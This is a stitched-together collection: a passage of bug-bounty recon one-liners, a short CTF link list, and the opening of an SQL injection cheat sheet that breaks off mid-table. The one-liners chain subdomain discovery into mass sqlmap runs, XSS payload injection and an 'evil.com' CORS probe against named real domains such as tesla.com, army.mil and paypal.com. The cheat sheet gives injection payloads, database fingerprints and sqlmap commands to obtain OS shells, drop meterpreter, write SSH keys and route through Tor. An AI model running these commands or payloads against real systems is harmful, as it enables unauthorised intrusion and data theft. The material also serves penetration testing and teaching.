'wingman -u @ --crawl | notify' ``` ### Search ASN to metabigor and resolvers domain - [Explaining command](https://bit.ly/3bvghsY) ```bash echo 'dod' | metabigor net --org -v | awk '{print $3}' | sed 's/[[0-9]]\+\.//g' | xargs -I@ sh -c 'prips @ | hakrevdns | anew' ``` ### OneLiners ### Search .json gospider filter anti-burl - [Explaining command](https://bit.ly/3eoUhSb) ```bash gospider -s https://twitch.tv --js | grep -E "\.js(?:onp?)?$" | awk '{print $4}' | tr -d "[]" | anew | anti-burl ``` ### Search .json subdomain - [Explaining command](https://bit.ly/3kZydis) ```bash assetfinder http://tesla.com | waybackurls | grep -E "\.json(?:onp?)?$" | anew ``` ### SonarDNS extract subdomains - [Explaining command](https://bit.ly/2NvXRyv) ```bash wget https://opendata.rapid7.com/sonar.fdns_v2/2021-02-26-1614298023-fdns_a.json.gz ; gunzip 2021-02-26-1614298023-fdns_a.json.gz ; cat 2021-02-26-1614298023-fdns_a.json | grep ".DOMAIN.com" | jq .name | tr '" " "' " / " | tee -a sonar ``` ### Kxss to search param XSS - [Explaining command](https://bit.ly/3aaEDHL) ```bash echo http://testphp.vulnweb.com/ | waybackurls | kxss ``` ### Recon subdomains and gau to search vuls DalFox - [Explaining command](https://bit.ly/3aMXQOF) ```bash assetfinder testphp.vulnweb.com | gau | dalfox pipe ``` ### Recon subdomains and Screenshot to URL using gowitness - [Explaining command](https://bit.ly/3aKSSCb) ```bash assetfinder -subs-only army.mil | httpx -silent -timeout 50 | xargs -I@ sh -c 'gowitness single @' ``` ### Extract urls to source code comments - [Explaining command](https://bit.ly/2MKkOxm) ```bash cat urls1 | html-tool comments | grep -oE '\b(https?|http)://[-A-Za-z0-9+&@#/%?=~_|!:,.;]*[-A-Za-z0-9+&@#/%=~_|]' ``` ### Axiom recon "complete" - [Explaining command](https://bit.ly/2NIavul) ```bash findomain -t domain -q -u url ; axiom-scan url -m subfinder -o subs --threads 3 ; axiom-scan subs -m httpx -o http ; axiom-scan http -m ffuf --threads 15 -o ffuf-output ; cat ffuf-output | tr "," " " | awk '{print $2}' | fff | grep 200 | sort -u ``` ### Domain subdomain extraction - [Explaining command](https://bit.ly/3c2t6eG) ```bash cat url | haktldextract -s -t 16 | tee subs.txt ; xargs -a subs.txt -I@ sh -c 'assetfinder -subs-only @ | anew | httpx -silent -threads 100 | anew httpDomain' ``` ### Search .js using - [Explaining command](https://bit.ly/362LyQF) ```bash assetfinder -subs-only DOMAIN -silent | httpx -timeout 3 -threads 300 --follow-redirects -silent | xargs -I% -P10 sh -c 'hakrawler -plain -linkfinder -depth 5 -url %' | awk '{print $3}' | grep -E "\.js(?:onp?)?$" | anew ``` ### This one was huge ... But it collects .js gau + wayback + gospider and makes an analysis of the js. tools you need below. - [Explaining command](https://bit.ly/3sD0pLv) ```bash cat dominios | gau |grep -iE '\.js'|grep -iEv '(\.jsp|\.json)' >> gauJS.txt ; cat dominios | waybackurls | grep -iE '\.js'|grep -iEv '(\.jsp|\.json)' >> waybJS.txt ; gospider -a -S dominios -d 2 | grep -Eo "(http|https)://[^/\"].*\.js+" | sed "s#\] \- #\n#g" >> gospiderJS.txt ; cat gauJS.txt waybJS.txt gospiderJS.txt | sort -u >> saidaJS ; rm -rf *.txt ; cat saidaJS | anti-burl |awk '{print $4}' | sort -u >> AliveJs.txt ; xargs -a AliveJs.txt -n 2 -I@ bash -c "echo -e '\n[URL]: @\n'; python3 linkfinder.py -i @ -o cli" ; cat AliveJs.txt | python3 collector.py output ; rush -i output/urls.txt 'python3 SecretFinder.py -i {} -o cli | sort -u >> output/resultJSPASS' ``` ### My recon automation simple. OFJAAAH.sh - [Explaining command](https://bit.ly/3nWHM22) ```bash chaos -d $1 -o chaos1 -silent ; assetfinder -subs-only $1 >> assetfinder1 ; subfinder -d $1 -o subfinder1 -silent ; cat assetfinder1 subfinder1 chaos1 >> hosts ; cat hosts | anew clearDOMAIN ; httpx -l hosts -silent -threads 100 | anew http200 ; rm -rf chaos1 assetfinder1 subfinder1 ``` ### Download all domains to bounty chaos - [Explaining command](https://bit.ly/38wPQ4o) ```bash curl https://chaos-data.projectdiscovery.io/index.json | jq -M '.[] | .URL | @sh' | xargs -I@ sh -c 'wget @ -q'; mkdir bounty ; unzip '*.zip' -d bounty/ ; rm -rf *zip ; cat bounty/*.txt >> allbounty ; sort -u allbounty >> domainsBOUNTY ; rm -rf allbounty bounty/ ; echo '@OFJAAAH' ``` ### Recon to search SSRF Test - [Explaining command](https://bit.ly/3shFFJ5) ```bash findomain -t DOMAIN -q | httpx -silent -threads 1000 | gau | grep "=" | qsreplace http://YOUR.burpcollaborator.net ``` ### ShuffleDNS to domains in file scan nuclei. - [Explaining command](https://bit.ly/2L3YVsc) ```bash xargs -a domain -I@ -P500 sh -c 'shuffledns -d "@" -silent -w words.txt -r resolvers.txt' | httpx -silent -threads 1000 | nuclei -t /root/nuclei-templates/ -o re1 ``` ### Search Asn Amass - [Explaining command](https://bit.ly/2EMooDB) Amass intel will search the organization "paypal" from a database of ASNs at a faster-than-default rate. It will then take these ASN numbers and scan the complete ASN/IP space for all tld's in that IP space (paypal.com, paypal.co.id, paypal.me) ```bash amass intel -org paypal -max-dns-queries 2500 | awk -F, '{print $1}' ORS=',' | sed 's/,$//' | xargs -P3 -I@ -d ',' amass intel -asn @ -max-dns-queries 2500'' ``` ### SQLINJECTION Mass domain file - [Explaining command](https://bit.ly/354lYuf) ```bash httpx -l domains -silent -threads 1000 | xargs -I@ sh -c 'findomain -t @ -q | httpx -silent | anew | waybackurls | gf sqli >> sqli ; sqlmap -m sqli --batch --random-agent --level 1' ``` ### Using chaos search js - [Explaining command](https://bit.ly/32vfRg7) Chaos is an API by Project Discovery that discovers subdomains. Here we are querying thier API for all known subdoains of "att.com". We are then using httpx to find which of those domains is live and hosts an HTTP or HTTPs site. We then pass those URLs to GoSpider to visit them and crawl them for all links (javascript, endpoints, etc). We then grep to find all the JS files. We pipe this all through anew so we see the output iterativlely (faster) and grep for "(http|https)://att.com" to make sure we dont recieve output for domains that are not "att.com". ```bash chaos -d att.com | httpx -silent | xargs -I@ -P20 sh -c 'gospider -a -s "@" -d 2' | grep -Eo "(http|https)://[^/"].*.js+" | sed "s#] ``` ### Search Subdomain using Gospider - [Explaining command](https://bit.ly/2QtG9do) GoSpider to visit them and crawl them for all links (javascript, endpoints, etc) we use some blacklist, so that it doesn’t travel, not to delay, grep is a command-line utility for searching plain-text data sets for lines that match a regular expression to search HTTP and HTTPS ```bash gospider -d 0 -s "https://site.com" -c 5 -t 100 -d 5 --blacklist jpg,jpeg,gif,css,tif,tiff,png,ttf,woff,woff2,ico,pdf,svg,txt | grep -Eo '(http|https)://[^/"]+' | anew ``` ### Using gospider to chaos - [Explaining command](https://bit.ly/2D4vW3W) GoSpider to visit them and crawl them for all links (javascript, endpoints, etc) chaos is a subdomain search project, to use it needs the api, to xargs is a command on Unix and most Unix-like operating systems used to build and execute commands from standard input. ```bash chaos -d paypal.com -bbq -filter-wildcard -http-url | xargs -I@ -P5 sh -c 'gospider -a -s "@" -d 3' ``` ### Using recon.dev and gospider crawler subdomains - [Explaining command](https://bit.ly/32pPRDa) We will use recon.dev api to extract ready subdomains infos, then parsing output json with jq, replacing with a Stream EDitor all blank spaces If anew, we can sort and display unique domains on screen, redirecting this output list to httpx to create a new list with just alive domains. Xargs is being used to deal with gospider with 3 parallel proccess and then using grep within regexp just taking http urls. ```bash curl "https://recon.dev/api/search?key=apiKEY&domain=paypal.com" |jq -r '.[].rawDomains[]' | sed 's/ //g' | anew |httpx -silent | xargs -P3 -I@ gospider -d 0 -s @ -c 5 -t 100 -d 5 --blacklist jpg,jpeg,gif,css,tif,tiff,png,ttf,woff,woff2,ico,pdf,svg,txt | grep -Eo '(http|https)://[^/"]+' | anew ``` ### PSQL - search subdomain using cert.sh - [Explaining command](https://bit.ly/32rMA6e) Make use of pgsql cli of crt.sh, replace all comma to new lines and grep just twitch text domains with anew to confirm unique outputs ```bash psql -A -F , -f querycrt -h http://crt.sh -p 5432 -U guest certwatch 2>/dev/null | tr ', ' '\n' | grep twitch | anew ``` ### Search subdomains using github and httpx - [Github-search](https://github.com/gwen001/github-search) Using python3 to search subdomains, httpx filter hosts by up status-code response (200) ```python ./github-subdomains.py -t APYKEYGITHUB -d domaintosearch | httpx --title ``` ### Search SQLINJECTION using qsreplace search syntax error - [Explained command](https://bit.ly/3hxFWS2) ```bash grep "=" .txt| qsreplace "' OR '1" | httpx -silent -store-response-dir output -threads 100 | grep -q -rn "syntax\|mysql" output 2>/dev/null && \printf "TARGET \033[0;32mCould Be Exploitable\e[m\n" || printf "TARGET \033[0;31mNot Vulnerable\e[m\n" ``` ### Search subdomains using jldc - [Explained command](https://bit.ly/2YBlEjm) ```bash curl -s "https://jldc.me/anubis/subdomains/att.com" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | anew ``` ### Search subdomains in assetfinder using hakrawler spider to search links in content responses - [Explained command](https://bit.ly/3hxRvZw) ```bash assetfinder -subs-only tesla.com -silent | httpx -timeout 3 -threads 300 --follow-redirects -silent | xargs -I% -P10 sh -c 'hakrawler -plain -linkfinder -depth 5 -url %' | grep "tesla" ``` ### Search subdomains in cert.sh - [Explained command](https://bit.ly/2QrvMXl) ```bash curl -s "https://crt.sh/?q=%25.att.com&output=json" | jq -r '.[].name_value' | sed 's/\*\.//g' | httpx -title -silent | anew ``` ### Search subdomains in cert.sh assetfinder to search in link /.git/HEAD - [Explained command](https://bit.ly/3lhFcTH) ```bash curl -s "https://crt.sh/?q=%25.tesla.com&output=json" | jq -r '.[].name_value' | assetfinder -subs-only | sed 's#$#/.git/HEAD#g' | httpx -silent -content-length -status-code 301,302 -timeout 3 -retries 0 -ports 80,8080,443 -threads 500 -title | anew ``` ```bash curl -s "https://crt.sh/?q=%25.enjoei.com.br&output=json" | jq -r '.[].name_value' | assetfinder -subs-only | httpx -silent -path /.git/HEAD -content-length -status-code 301,302 -timeout 3 -retries 0 -ports 80,8080,443 -threads 500 -title | anew ``` ### Collect js files from hosts up by gospider - [Explained command](https://bit.ly/3aWIwyI) ```bash xargs -P 500 -a pay -I@ sh -c 'nc -w1 -z -v @ 443 2>/dev/null && echo @' | xargs -I@ -P10 sh -c 'gospider -a -s "https://@" -d 2 | grep -Eo "(http|https)://[^/\"].*\.js+" | sed "s#\] \- #\n#g" | anew' ``` ### Subdomain search Bufferover resolving domain to httpx - [Explained command](https://bit.ly/3lno9j0) ```bash curl -s https://dns.bufferover.run/dns?q=.sony.com |jq -r .FDNS_A[] | sed -s 's/,/\n/g' | httpx -silent | anew ``` ### Using gargs to gospider search with parallel proccess - [Gargs](https://github.com/brentp/gargs) - [Explained command](https://bit.ly/2EHj1FD) ```bash httpx -ports 80,443,8009,8080,8081,8090,8180,8443 -l domain -timeout 5 -threads 200 --follow-redirects -silent | gargs -p 3 'gospider -m 5 --blacklist pdf -t 2 -c 300 -d 5 -a -s {}' | anew stepOne ``` ### Injection xss using qsreplace to urls filter to gospider - [Explained command](https://bit.ly/3joryw9) ```bash gospider -S domain.txt -t 3 -c 100 | tr " " "\n" | grep -v ".js" | grep "https://" | grep "=" | qsreplace '%22><svg%20onload=confirm(1);>' ``` ### Extract URL's to apk - [Explained command](https://bit.ly/2QzXwJr) ```bash apktool d app.apk -o uberApk;grep -Phro "(https?://)[\w\.-/]+[\"'\`]" uberApk/ | sed 's#"##g' | anew | grep -v "w3\|android\|github\|schemas.android\|google\|goo.gl" ``` ### Chaos to Gospider - [Explained command](https://bit.ly/3gFJbpB) ```bash chaos -d att.com -o att -silent | httpx -silent | xargs -P100 -I@ gospider -c 30 -t 15 -d 4 -a -H "x-forwarded-for: 127.0.0.1" -H "User-Agent: Mozilla/5.0 (Linux; U; Android 2.2) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1" -s @ ``` ### Checking invalid certificate - [Real script](https://bit.ly/2DhAwMo) - [Script King](https://bit.ly/34Z0kIH) ```bash xargs -a domain -P1000 -I@ sh -c 'bash cert.sh @ 2> /dev/null' | grep "EXPIRED" | awk '/domain/{print $5}' | httpx ``` ### Using shodan & Nuclei - [Explained command](https://bit.ly/3jslKle) Shodan is a search engine that lets the user find specific types of computers connected to the internet, AWK Cuts the text and prints the third column. httpx is a fast and multi-purpose HTTP using -silent. Nuclei is a fast tool for configurable targeted scanning based on templates offering massive extensibility and ease of use, You need to download the nuclei templates. ```bash shodan domain DOMAIN TO BOUNTY | awk '{print $3}' | httpx -silent | nuclei -t /nuclei-templates/ ``` ### Open Redirect test using gf. - [Explained command](https://bit.ly/3hL263x) echo is a command that outputs the strings it is being passed as arguments. What to Waybackurls? Accept line-delimited domains on stdin, fetch known URLs from the Wayback Machine for .domain.com and output them on stdout. Httpx? is a fast and multi-purpose HTTP. GF? A wrapper around grep to avoid typing common patterns and anew Append lines from stdin to a file, but only if they don't already appear in the file. Outputs new lines to stdout too, removes duplicates. ```bash echo "domain" | waybackurls | httpx -silent -timeout 2 -threads 100 | gf redirect | anew ``` ### Using shodan to jaeles "How did I find a critical today? well as i said it was very simple, using shodan and jaeles". - [Explained command](https://bit.ly/2QQfY0l) ```bash shodan domain domain| awk '{print $3}'| httpx -silent | anew | xargs -I@ jaeles scan -c 100 -s /jaeles-signatures/ -u @ ``` ### Using Chaos to jaeles "How did I find a critical today?. - [Explained command](https://bit.ly/2YXiK8N) To chaos this project to projectdiscovery, Recon subdomains, using httpx, if we see the output from chaos domain.com we need it to be treated as http or https, so we use httpx to get the results. We use anew, a tool that removes duplicates from @TomNomNom, to get the output treated for import into jaeles, where he will scan using his templates. ```bash chaos -d domain | httpx -silent | anew | xargs -I@ jaeles scan -c 100 -s /jaeles-signatures/ -u @ ``` ### Using shodan to jaeles - [Explained command](https://bit.ly/2Dkmycu) ```bash domain="domaintotest";shodan domain $domain | awk -v domain="$domain" '{print $1"."domain}'| httpx -threads 300 | anew shodanHostsUp | xargs -I@ -P3 sh -c 'jaeles -c 300 scan -s jaeles-signatures/ -u @'| anew JaelesShodanHosts ``` ### Search to files using assetfinder and ffuf - [Explained command](https://bit.ly/2Go3Ba4) ```bash assetfinder att.com | sed 's#*.# #g' | httpx -silent -threads 10 | xargs -I@ sh -c 'ffuf -w path.txt -u @/FUZZ -mc 200 -H "Content-Type: application/json" -t 150 -H "X-Forwarded-For:127.0.0.1"' ``` ### HTTPX using new mode location and injection XSS using qsreplace. - [Explained command](https://bit.ly/2Go3Ba4) ```bash httpx -l master.txt -silent -no-color -threads 300 -location 301,302 | awk '{print $2}' | grep -Eo '(http|https)://[^/"].*' | tr -d '[]' | anew | xargs -I@ sh -c 'gospider -d 0 -s @' | tr ' ' '\n' | grep -Eo '(http|https)://[^/"].*' | grep "=" | qsreplace "<svg onload=alert(1)>" "' ``` ### Grap internal juicy paths and do requests to them. - [Explained command](https://bit.ly/357b1IY) ```bash export domain="https://target";gospider -s $domain -d 3 -c 300 | awk '/linkfinder/{print $NF}' | grep -v "http" | grep -v "http" | unfurl paths | anew | xargs -I@ -P50 sh -c 'echo $domain@ | httpx -silent -content-length' ``` ### Download to list bounty targets We inject using the sed .git/HEAD command at the end of each url. - [Explained command](https://bit.ly/2R2gNn5) ```bash wget https://raw.githubusercontent.com/arkadiyt/bounty-targets-data/master/data/domains.txt -nv | cat domains.txt | sed 's#$#/.git/HEAD#g' | httpx -silent -content-length -status-code 301,302 -timeout 3 -retries 0 -ports 80,8080,443 -threads 500 -title | anew ``` ### Using to findomain to SQLINJECTION. - [Explained command](https://bit.ly/2ZeAhcF) ```bash findomain -t testphp.vulnweb.com -q | httpx -silent | anew | waybackurls | gf sqli >> sqli ; sqlmap -m sqli --batch --random-agent --level 1 ``` ### Jaeles scan to bugbounty targets. - [Explained command](https://bit.ly/3jXbTnU) ```bash wget https://raw.githubusercontent.com/arkadiyt/bounty-targets-data/master/data/domains.txt -nv ; cat domains.txt | anew | httpx -silent -threads 500 | xargs -I@ jaeles scan -s /jaeles-signatures/ -u @ ``` ### JLDC domain search subdomain, using rush and jaeles. - [Explained command](https://bit.ly/3hfNV5k) ```bash curl -s "https://jldc.me/anubis/subdomains/sony.com" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | httpx -silent -threads 300 | anew | rush -j 10 'jaeles scan -s /jaeles-signatures/ -u {}' ``` ### Chaos to search subdomains check cloudflareip scan port. - [Explained command](https://bit.ly/3hfNV5k) ```bash chaos -silent -d paypal.com | filter-resolved | cf-check | anew | naabu -rate 60000 -silent -verify | httpx -title -silent ``` ### Search JS to domains file. - [Explained command](https://bit.ly/2Zs13yj) ```bash cat FILE TO TARGET | httpx -silent | subjs | anew ``` ### Search JS using assetfinder, rush and hakrawler. - [Explained command](https://bit.ly/3ioYuV0) ```bash assetfinder -subs-only paypal.com -silent | httpx -timeout 3 -threads 300 --follow-redirects -silent | rush 'hakrawler -plain -linkfinder -depth 5 -url {}' | grep "paypal" ``` ### Search to CORS using assetfinder and rush - [Explained command](https://bit.ly/33qT71x) ```bash assetfinder fitbit.com | httpx -threads 300 -follow-redirects -silent | rush -j200 'curl -m5 -s -I -H "Origin:evil.com" {} | [[ $(grep -c "evil.com") -gt 0 ]] && printf "\n\033[0;32m[VUL TO CORS] - {}\e[m"' 2>/dev/null" ``` ### Search to js using hakrawler and rush & unew - [Explained command](https://bit.ly/2Rqn9gn) ```bash cat hostsGospider | rush -j 100 'hakrawler -js -plain -usewayback -depth 6 -scope subs -url {} | unew hakrawlerHttpx' ``` ### XARGS to dirsearch brute force. - [Explained command](https://bit.ly/32MZfCa) ```bash cat hosts | xargs -I@ sh -c 'python3 dirsearch.py -r -b -w path -u @ -i 200, 403, 401, 302 -e php,html,json,aspx,sql,asp,js' ``` ### Assetfinder to run massdns. - [Explained command](https://bit.ly/32T5W5O) ```bash assetfinder DOMAIN --subs-only | anew | massdns -r lists/resolvers.txt -t A -o S -w result.txt ; cat result.txt | sed 's/A.*//; s/CN.*// ; s/\..$//' | httpx -silent ``` ### Extract path to js - [Explained command](https://bit.ly/3icrr5R) ```bash cat file.js | grep -aoP "(?<=(\"|\'|\`))\/[a-zA-Z0-9_?&=\/\-\#\.]*(?=(\"|\'|\`))" | sort -u ``` ### Find subdomains and Secrets with jsubfinder - [Explained command](https://bit.ly/3dvP6xq) ```bash cat subdomsains.txt | httpx --silent | jsubfinder -s ``` ### Search domains to Range-IPS. - [Explained command](https://bit.ly/3fa0eAO) ```bash cat dod1 | awk '{print $1}' | xargs -I@ sh -c 'prips @ | hakrevdns -r 1.1.1.1' | awk '{print $2}' | sed -r 's/.$//g' | httpx -silent -timeout 25 | anew ``` ### Search new's domains using dnsgen. - [Explained command](https://bit.ly/3kNTHNm) ```bash xargs -a army1 -I@ sh -c 'echo @' | dnsgen - | httpx -silent -threads 10000 | anew newdomain ``` ### List ips, domain extract, using amass + wordlist - [Explained command](https://bit.ly/2JpRsmS) ```bash amass enum -src -ip -active -brute -d navy.mil -o domain ; cat domain | cut -d']' -f 2 | awk '{print $1}' | sort -u > hosts-amass.txt ; cat domain | cut -d']' -f2 | awk '{print $2}' | tr ',' '\n' | sort -u > ips-amass.txt ; curl -s "https://crt.sh/?q=%.navy.mil&output=json" | jq '.[].name_value' | sed 's/\"//g' | sed 's/\*\.//g' | sort -u > hosts-crtsh.txt ; sed 's/$/.navy.mil/' dns-Jhaddix.txt_cleaned > hosts-wordlist.txt ; cat hosts-amass.txt hosts-crtsh.txt hosts-wordlist.txt | sort -u > hosts-all.txt ``` ### Search domains using amass and search vul to nuclei. - [Explained command](https://bit.ly/3gsbzNt) ```bash amass enum -passive -norecursive -d disa.mil -o domain ; httpx -l domain -silent -threads 10 | nuclei -t PATH -o result -timeout 30 ``` ### Verify to cert using openssl. - [Explained command](https://bit.ly/37avq0C) ```bash sed -ne 's/^\( *\)Subject:/\1/p;/X509v3 Subject Alternative Name/{ N;s/^.*\n//;:a;s/^\( *\)\(.*\), /\1\2\n\1/;ta;p;q; }' < <( openssl x509 -noout -text -in <( openssl s_client -ign_eof 2>/dev/null <<<$'HEAD / HTTP/1.0\r\n\r' \ -connect hackerone.com:443 ) ) ``` ### Search domains using openssl to cert. - [Explained command](https://bit.ly/3m9AsOY) ```bash xargs -a recursivedomain -P50 -I@ sh -c 'openssl s_client -connect @:443 2>&1 '| sed -E -e 's/[[:blank:]]+/\n/g' | httpx -silent -threads 1000 | anew ``` ### Search to Hackers. - [Censys](https://censys.io) - [Spyce](https://spyce.com) - [Shodan](https://shodan.io) - [Viz Grey](https://viz.greynoise.io) - [Zoomeye](https://zoomeye.org) - [Onyphe](https://onyphe.io) - [Wigle](https://wigle.net) - [Intelx](https://intelx.io) - [Fofa](https://fofa.so) - [Hunter](https://hunter.io) - [Zorexeye](https://zorexeye.com) - [Pulsedive](https://pulsedive.com) - [Netograph](https://netograph.io) - [Vigilante](https://vigilante.pw) - [Pipl](https://pipl.com) - [Abuse](https://abuse.ch) - [Cert-sh](https://cert.sh) - [Maltiverse](https://maltiverse.com/search) - [Insecam](https://insecam.org) - [Anubis](https://https://jldc.me/anubis/subdomains/att.com) - [Dns Dumpster](https://dnsdumpster.com) - [PhoneBook](https://phonebook.cz) - [Inquest](https://labs.inquest.net) - [Scylla](https://scylla.sh) # Project [![made-with-Go](https://img.shields.io/badge/Made%20with-Go-1f425f.svg)](http://golang.org) [![made-with-bash](https://img.shields.io/badge/Made%20with-Bash-1f425f.svg)](https://www.gnu.org/software/bash/) [![Open Source? Yes!](https://badgen.net/badge/Open%20Source%20%3F/Yes%21/blue?icon=github)](https://github.com/Naereen/badges/) [![Telegram](https://patrolavia.github.io/telegram-badge/chat.png)](https://t.me/KingOfTipsBugBounty) <a href="https://www.buymeacoffee.com/OFJAAAH" target="_blank"><img src="https://www.buymeacoffee.com/assets/img/custom_images/orange_img.png" alt="Buy Me A Coffee" style="height: 20px !important;width: 50px !important;box-shadow: 0px 3px 2px 0px rgba(190, 190, 190, 0.5) !important;-webkit-box-shadow: 0px 3px 2px 0px rgba(190, 190, 190, 0.5) !important;" ></a>
# CTF-resources ![alt text](https://github.com/tcrosby56/CTF-resources/blob/master/skull.jpg) **SSH Tricks and Tips** [SSH Tunneling](https://github.com/tcrosby56/CTF-resources/blob/master/SSH_TUNNEL.md) **CTF RESOURCES** [Over the Wire](https://overthewire.org/) [Hack This Site](https://www.hackthissite.org/) [Hack The Box](https://www.hackthebox.eu/) **Pentesting Resources** [The CyberMentor](https://www.youtube.com/channel/UC0ArlFuFYMpEewyRBzdLHiw) **Linux** [Tutorial Linux](https://www.youtube.com/channel/UCvA_wgsX6eFAOXI8Rbg_WiQ) [The Lunduke Show](https://www.youtube.com/channel/UCkK9UDm_ZNrq_rIXCz3xCGA) **Security** [Krebs on Security](https://krebsonsecurity.com/) [The Hacker News](https://thehackernews.com/)
# SQL injection > A SQL injection attack consists of insertion or "injection" of a SQL query via the input data from the client to the application. Attempting to manipulate SQL queries may have goals including: - Information Leakage - Disclosure of stored data - Manipulation of stored data - Bypassing authorisation controls ## Summary * [CheatSheet MSSQL Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/MSSQL%20Injection.md) * [CheatSheet MySQL Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/MySQL%20Injection.md) * [CheatSheet OracleSQL Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/OracleSQL%20Injection.md) * [CheatSheet PostgreSQL Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/PostgreSQL%20Injection.md) * [CheatSheet SQLite Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/SQLite%20Injection.md) * [CheatSheet Cassandra Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/Cassandra%20Injection.md) * [Entry point detection](#entry-point-detection) * [DBMS Identification](#dbms-identification) * [SQL injection using SQLmap](#sql-injection-using-sqlmap) * [Authentication bypass](#authentication-bypass) * [Polyglot injection](#polyglot-injection-multicontext) * [Routed injection](#routed-injection) * [Insert Statement - ON DUPLICATE KEY UPDATE](#insert-statement---on-duplicate-key-update) * [WAF Bypass](#waf-bypass) ## Entry point detection Detection of an SQL injection entry point Simple characters ```sql ' %27 " %22 # %23 ; %3B ) Wildcard (*) ``` Multiple encoding ```sql %%2727 %25%27 ``` Merging characters ```sql `+HERP '||'DERP '+'herp ' 'DERP '%20'HERP '%2B'HERP ``` Logic Testing ```sql page.asp?id=1 or 1=1 -- true page.asp?id=1' or 1=1 -- true page.asp?id=1" or 1=1 -- true page.asp?id=1 and 1=2 -- false ``` Weird characters ```sql Unicode character U+02BA MODIFIER LETTER DOUBLE PRIME (encoded as %CA%BA) was transformed into U+0022 QUOTATION MARK (") Unicode character U+02B9 MODIFIER LETTER PRIME (encoded as %CA%B9) was transformed into U+0027 APOSTROPHE (') ``` ## DBMS Identification ```c ["conv('a',16,2)=conv('a',16,2)" ,"MYSQL"], ["connection_id()=connection_id()" ,"MYSQL"], ["crc32('MySQL')=crc32('MySQL')" ,"MYSQL"], ["BINARY_CHECKSUM(123)=BINARY_CHECKSUM(123)" ,"MSSQL"], ["@@CONNECTIONS>0" ,"MSSQL"], ["@@CONNECTIONS=@@CONNECTIONS" ,"MSSQL"], ["@@CPU_BUSY=@@CPU_BUSY" ,"MSSQL"], ["USER_ID(1)=USER_ID(1)" ,"MSSQL"], ["ROWNUM=ROWNUM" ,"ORACLE"], ["RAWTOHEX('AB')=RAWTOHEX('AB')" ,"ORACLE"], ["LNNVL(0=123)" ,"ORACLE"], ["5::int=5" ,"POSTGRESQL"], ["5::integer=5" ,"POSTGRESQL"], ["pg_client_encoding()=pg_client_encoding()" ,"POSTGRESQL"], ["get_current_ts_config()=get_current_ts_config()" ,"POSTGRESQL"], ["quote_literal(42.5)=quote_literal(42.5)" ,"POSTGRESQL"], ["current_database()=current_database()" ,"POSTGRESQL"], ["sqlite_version()=sqlite_version()" ,"SQLITE"], ["last_insert_rowid()>1" ,"SQLITE"], ["last_insert_rowid()=last_insert_rowid()" ,"SQLITE"], ["val(cvar(1))=1" ,"MSACCESS"], ["IIF(ATN(2)>0,1,0) BETWEEN 2 AND 0" ,"MSACCESS"], ["cdbl(1)=cdbl(1)" ,"MSACCESS"], ["1337=1337", "MSACCESS,SQLITE,POSTGRESQL,ORACLE,MSSQL,MYSQL"], ["'i'='i'", "MSACCESS,SQLITE,POSTGRESQL,ORACLE,MSSQL,MYSQL"], ``` ## SQL injection using SQLmap ### Basic arguments for SQLmap ```powershell sqlmap --url="<url>" -p username --user-agent=SQLMAP --random-agent --threads=10 --risk=3 --level=5 --eta --dbms=MySQL --os=Linux --banner --is-dba --users --passwords --current-user --dbs ``` ### Load a request file and use mobile user-agent ```powershell sqlmap -r sqli.req --safe-url=http://10.10.10.10/ --mobile --safe-freq=1 ``` ### Custom injection in UserAgent/Header/Referer/Cookie ```powershell python sqlmap.py -u "http://example.com" --data "username=admin&password=pass" --headers="x-forwarded-for:127.0.0.1*" The injection is located at the '*' ``` ### Second order injection ```powershell python sqlmap.py -r /tmp/r.txt --dbms MySQL --second-order "http://targetapp/wishlist" -v 3 sqlmap -r 1.txt -dbms MySQL -second-order "http://<IP/domain>/joomla/administrator/index.php" -D "joomla" -dbs ``` ### Shell ```powershell SQL Shell python sqlmap.py -u "http://example.com/?id=1" -p id --sql-shell Simple Shell python sqlmap.py -u "http://example.com/?id=1" -p id --os-shell Dropping a reverse-shell / meterpreter python sqlmap.py -u "http://example.com/?id=1" -p id --os-pwn SSH Shell by dropping an SSH key python sqlmap.py -u "http://example.com/?id=1" -p id --file-write=/root/.ssh/id_rsa.pub --file-destination=/home/user/.ssh/ ``` ### Crawl a website with SQLmap and auto-exploit ```powershell sqlmap -u "http://example.com/" --crawl=1 --random-agent --batch --forms --threads=5 --level=5 --risk=3 --batch = non interactive mode, usually Sqlmap will ask you questions, this accepts the default answers --crawl = how deep you want to crawl a site --forms = Parse and test forms ``` ### Using TOR with SQLmap ```powershell sqlmap -u "http://www.target.com" --tor --tor-type=SOCKS5 --time-sec 11 --check-tor --level=5 --risk=3 --threads=5 ``` ### Using a proxy with SQLmap ```powershell sqlmap -u "http://www.target.com" --proxy="http://127.0.0.1:8080" ``` ### Using Chrome cookie and a Proxy ```powershell sqlmap -u "https://test.com/index.php?id=99" --load-cookie=/media/truecrypt1/TI/cookie.txt --proxy "http://127.0.0.1:8080" -f --time-sec 15 --level 3 ``` ### Using suffix to tamper the injection ```powershell python sqlmap.py -u "http://example.com/?id=1" -p id --suffix="-- " ``` ### General tamper option and tamper's list ```powershell tamper=name_of_the_tamper ``` | Tamper | Description | | --- | --- | |0x2char.py | Replaces each (MySQL) 0x<hex> encoded string with equivalent CONCAT(CHAR(),…) counterpart | |apostrophemask.py | Replaces apostrophe character with its UTF-8 full width counterpart | |apostrophenullencode.py | Replaces apostrophe character with its illegal double unicode counterpart| |appendnullbyte.py | Appends encoded NULL byte character at the end of payload | |base64encode.py | Base64 all characters in a given payload | |between.py | Replaces greater than operator ('>') with 'NOT BETWEEN 0 AND #' | |bluecoat.py | Replaces space character after SQL statement with a valid random blank character.Afterwards replace character = with LIKE operator | |chardoubleencode.py | Double url-encodes all characters in a given payload (not processing already encoded) | |charencode.py | URL-encodes all characters in a given payload (not processing already encoded) (e.g. SELECT -> %53%45%4C%45%43%54) | |charunicodeencode.py | Unicode-URL-encodes all characters in a given payload (not processing already encoded) (e.g. SELECT -> %u0053%u0045%u004C%u0045%u0043%u0054) | |charunicodeescape.py | Unicode-escapes 